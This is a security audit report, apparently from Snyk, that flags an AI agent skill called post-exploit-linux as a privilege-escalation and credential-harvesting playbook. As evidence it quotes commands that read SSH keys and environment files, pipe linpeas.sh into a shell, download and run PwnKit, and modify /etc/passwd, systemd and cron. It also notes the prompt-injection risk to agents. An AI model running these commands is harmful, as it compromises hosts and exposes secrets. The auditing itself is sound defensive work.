post-exploit-linux
Audited by Snyk on Apr 22, 2026
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The skill explicitly instructs reading and outputting sensitive files and environment values (e.g., cat ~/.ssh/id_rsa, .env, /proc/*/environ, config files and history), which requires the LLM/agent to handle secret values verbatim and thus poses high exfiltration risk.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.70). These URLs point to well-known offensive-security resources (the official PEASS-ng linpeas.sh on GitHub and the GTFOBins documentation site) that are legitimate and widely used by defenders but provide direct executable scripts and privilege-escalation techniques that can be abused or deliver malicious actions if run unverified on a target, so they should be treated as moderate-to-high risk to execute without validation.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This skill is an explicit post‑exploitation playbook providing step‑by‑step commands for privilege escalation, credential harvesting, persistence and lateral movement, clearly intended to facilitate unauthorized system compromise.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs fetching and running public third‑party content (e.g., "curl -fsSL https://github.com/peass-ng/PEASS-ng/.../linpeas.sh | sh", git clone/wget/curl of GitHub exploit repos and links to GTFOBins), so the agent would ingest untrusted web content that can materially influence subsequent tool use and decisions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs runtime fetching-and-executing of remote code (high-risk) — e.g., "curl -fsSL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh" (also examples like "curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit && chmod +x PwnKit && ./PwnKit" and "git clone https://github.com/saghul/lxd-alpine-builder"), so these URLs are used at runtime to retrieve and run external code.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill is an explicit post-exploitation/privesc guide that directs the agent to obtain/abuse sudo, modify system files (e.g. /etc/passwd, systemd service files, cron), create or escalate to root accounts, and run kernel exploits — all actions that directly change and compromise the host state.
Issues (6)
Insecure credential handling detected in skill instructions.
Suspicious download URL detected in skill instructions.
Malicious code pattern detected in skill scripts.
Third-party content exposure detected (indirect prompt injection risk).
Unverifiable external dependency detected (runtime URL that controls agent).
Attempt to modify system services in skill instructions.